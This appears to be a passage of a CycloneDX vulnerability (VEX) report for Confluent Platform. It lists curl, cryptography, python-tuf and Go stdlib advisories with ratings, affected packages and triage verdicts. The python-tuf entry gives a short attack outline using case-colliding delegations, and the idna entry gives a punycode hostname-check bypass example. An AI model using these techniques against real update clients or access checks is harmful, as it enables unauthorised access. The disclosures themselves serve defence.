          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "GHSA-537c-gmf6-5ccf",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "description": "pyca/cryptography's wheels include a statically linked copy of OpenSSL. The versions of OpenSSL included in wheels prior to cryptograph 48.01 are vulnerable to a security issue. More details about the vulnerability itself can be found in https://openssl-library.org/news/secadv/20260609.txt.\n\nIf you are building cryptography source (\"sdist\") then you are responsible for upgrading your copy of OpenSSL. Only users installing from wheels built by the cryptography project (i.e., those distributed on PyPI) need to update their cryptography versions.",
      "recommendation": "Upgrade cryptography to version 48.0.1",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-537c-gmf6-5ccf"
        },
        {
          "url": "https://github.com/pyca/cryptography"
        },
        {
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-537c-gmf6-5ccf"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        }
      ],
      "published": "2026-06-15T20:12:27+00:00",
      "updated": "2026-06-15T20:12:27+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/cryptography@46.0.7",
          "versions": [
            {
              "version": "46.0.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:pypi/cryptography@46.0.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. the flaw is the OpenSSL bundled inside the Python cryptography wheel; the product does not process attacker-controlled cryptographic input through that Python path, so the vulnerable code is not reachable."
      }
    },
    {
      "id": "GHSA-qp9x-wp8f-qgjj",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "description": "`DelegatedRole._is_target_in_pathpattern` uses `fnmatch.fnmatch` to decide whether a given target path is authorized by a delegation's glob pattern.\n\nPython's `fnmatch.fnmatch` calls `os.path.normcase()` on both arguments before matching. On POSIX hosts `normcase` is the identity function; on Windows hosts `os.path` resolves to `ntpath`, whose `normcase` lowercases its input and replaces `/` with `\\`.\n\nAs a result, python-tuf's delegation *path pattern* matching is case-sensitive on Linux/macOS but case-INSENSITIVE on Windows. This makes the authorization decision for a target dependent on the host operating system of the client running the updater.\n\nThe result on Windows is a TUF specification violation in the python-tuf `ngclient` implementation.\n\n## Vulnerable code\n\n`tuf/api/_payload.py` (HEAD `7ecb67d`):\n\n```python\n1183  @staticmethod\n1184  def _is_target_in_pathpattern(targetpath: str, pathpattern: str) -> bool:\n1185      \"\"\"Determine whether ``targetpath`` matches the ``pathpattern``.\"\"\"\n1186      # We need to make sure that targetpath and pathpattern are pointing to\n1187      # the same directory as fnmatch doesn't threat \"/\" as a special symbol.\n1188      target_parts = targetpath.split(\"/\")\n1189      pattern_parts = pathpattern.split(\"/\")\n1190      if len(target_parts) != len(pattern_parts):\n1191          return False\n1192\n1193      # Every part in the pathpattern could include a glob pattern, that's why\n1194      # each of the target and pathpattern parts should match.\n1195      for target, pattern in zip(target_parts, pattern_parts, strict=True):\n1196          if not fnmatch.fnmatch(target, pattern):\n1197              return False\n1198      return True\n```\n\n`fnmatch.fnmatch` source (Python 3.12, unchanged in current mainline):\n\n```python\ndef fnmatch(name, pat):\n    ...\n    name = os.path.normcase(name)\n    pat = os.path.normcase(pat)\n    return fnmatchcase(name, pat)\n```\n\n## Fix\n\nReplace `fnmatch.fnmatch` with `fnmatch.fnmatchcase`, which is explicitly documented as \"not applying case normalization\", so it behaves identically across platforms.\n\n## Attack\n\n1. A TUF repository with two path-based delegations whose patterns differ only in case \u2014 for example, `Foo/*` and `foo/*`.\n2. The \"attacker\" delegation is listed BEFORE the \"legit\" delegation in the delegation order.\n3. The client searches for `foo/something`: on Windows, it will find the \"attacker\" provided target \"Foo/something\".\n\n\n## Exploitability caveats \n\n* The attack needs a repository configuration with case-colliding delegation path patterns. The attacker must control one of the delegated roles.\n* Delegation ordering matters: the attacker-controlled role must be visited BEFORE the legit role in the pre-order walk.\n* The client must run on Windows. No effect on Linux/macOS.\n\n## Credit\n\nReporter: Koda Reef @kodareef5 \nAdvisory edits: Jussi Kukkonen @jku",
      "recommendation": "Upgrade tuf to version 7.0.0",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-qp9x-wp8f-qgjj"
        },
        {
          "url": "https://github.com/theupdateframework/python-tuf"
        },
        {
          "url": "https://github.com/theupdateframework/python-tuf/releases/tag/v7.0.0"
        },
        {
          "url": "https://github.com/theupdateframework/python-tuf/security/advisories/GHSA-qp9x-wp8f-qgjj"
        }
      ],
      "published": "2026-05-28T22:46:13+00:00",
      "updated": "2026-05-28T22:46:13+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/tuf@6.0.0",
          "versions": [
            {
              "version": "6.0.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:pypi/tuf@6.0.0"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. python-tuf is not used to verify attacker-controlled update metadata in the product runtime, so the delegation path-matching flaw is not reachable."
      }
    },
    {
      "id": "CVE-2026-33818",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Enforce a recursion limit in Unmarshal to prevent stack exhaustion when parsing deeply-nested, recursive structures.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33818"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-33818"
        },
        {
          "url": "https://go.dev/cl/814980"
        },
        {
          "url": "https://go.dev/issue/80405"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33818"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-5972"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33818"
        }
      ],
      "published": "2026-08-13T22:17:19+00:00",
      "updated": "2026-08-14T16:16:55+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#c59bd67f-00ce-4797-a91c-6d4ff9417f79"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#cc905330-a0b5-4fda-a146-bfc61b975282"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#c0ee620e-0d44-421b-94c0-80424dc2f306"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#f5d36586-7474-4ab2-a672-7d613fb5bffe"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#364133d9-ec3a-4026-b5d5-b726139ca458"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#62a28906-1968-4f06-a6e9-e1e760e08077"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#fd3ac5da-4130-48e7-b65a-daf1e6fce61f"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#a72eb2de-9501-4c75-b3b6-da1149109181"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c662774d-1e8b-4f4b-9358-27562de2262d"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ed91413a-eaa2-4aef-886a-56aa02da233d"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#e8501d1b-4e18-43af-a2b8-228a6470aa23"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#afcc76dd-9513-4721-8d6c-cc704207bdaa"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-39821",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1289
      ],
      "description": "The ToASCII and ToUnicode functions incorrectly accept Punycode-encoded labels that decode to an ASCII-only label. For example, ToUnicode(\"xn--example-.com\") incorrectly returns the name \"example.com\" rather than an error. This behavior can lead to privilege escalation in programs using the idna package. For example, a program which performs privilege checks on the ASCII hostname may reject \"example.com\" but permit \"xn--example-.com\". If that program subsequently converts the ASCII hostname to Unicode, it will inadvertently permits access to the Unicode name \"example.com\".",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-39821"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:23262"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:23264"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26546"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26547"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30650"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30651"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30853"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30854"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30855"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33155"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33163"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33173"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33183"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33524"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33531"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34342"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34357"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34359"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34364"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34789"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35826"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35827"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35828"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35829"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35830"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35831"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35993"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35994"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36105"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36167"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36207"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36648"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36651"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36796"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36797"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36808"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36820"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36883"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37387"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37435"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37436"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:38995"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39005"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39573"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39879"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40118"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40262"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40945"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41019"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41030"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41031"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41036"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41055"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41066"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41928"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41930"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42043"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42047"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42048"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42049"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42050"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42051"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42078"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42079"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42080"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42082"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42132"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42142"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42146"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42150"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42151"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42240"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42796"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42852"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43038"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43052"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43692"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44622"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44624"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:46395"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47149"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47735"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47737"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47952"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50300"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50843"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51033"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51112"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51187"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51194"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51341"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:52826"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53374"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53412"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53413"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53415"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53530"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54191"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54274"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54283"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54284"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54285"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54286"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54287"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54395"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54401"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54435"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54441"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54531"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54580"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54757"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56143"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56223"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56340"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56431"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-39821"
        },
        {
          "url": "https://bugzilla.redhat.com/2480756"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480756"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484207"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498152"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27145"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-39821"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-39822"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-37435.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:38995"
        },
        {
          "url": "https://github.com/golang/go/issues/78760"
        },
        {
          "url": "https://go.dev/cl/767220"
        },
        {
          "url": "https://go.dev/issue/78760"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-39821.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-46395.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39821"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-5026"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-39821.json"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8416-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-39821"
        }
      ],
      "published": "2026-05-22T16:16:20+00:00",
      "updated": "2026-08-19T12:18:01+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#c59bd67f-00ce-4797-a91c-6d4ff9417f79"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#cc905330-a0b5-4fda-a146-bfc61b975282"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#c0ee620e-0d44-421b-94c0-80424dc2f306"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#f5d36586-7474-4ab2-a672-7d613fb5bffe"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#364133d9-ec3a-4026-b5d5-b726139ca458"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#62a28906-1968-4f06-a6e9-e1e760e08077"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#fd3ac5da-4130-48e7-b65a-daf1e6fce61f"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#a72eb2de-9501-4c75-b3b6-da1149109181"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c662774d-1e8b-4f4b-9358-27562de2262d"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ed91413a-eaa2-4aef-886a-56aa02da233d"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#e8501d1b-4e18-43af-a2b8-228a6470aa23"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#afcc76dd-9513-4721-8d6c-cc704207bdaa"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-39824",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [],
      "cwes": [
        190
      ],
      "description": "NewNTUnicodeString does not check for string length overflow. When provided with a string that overflows the maximum size of a NTUnicodeString (a 16-bit number of bytes), it returns a truncated string rather than an error.",
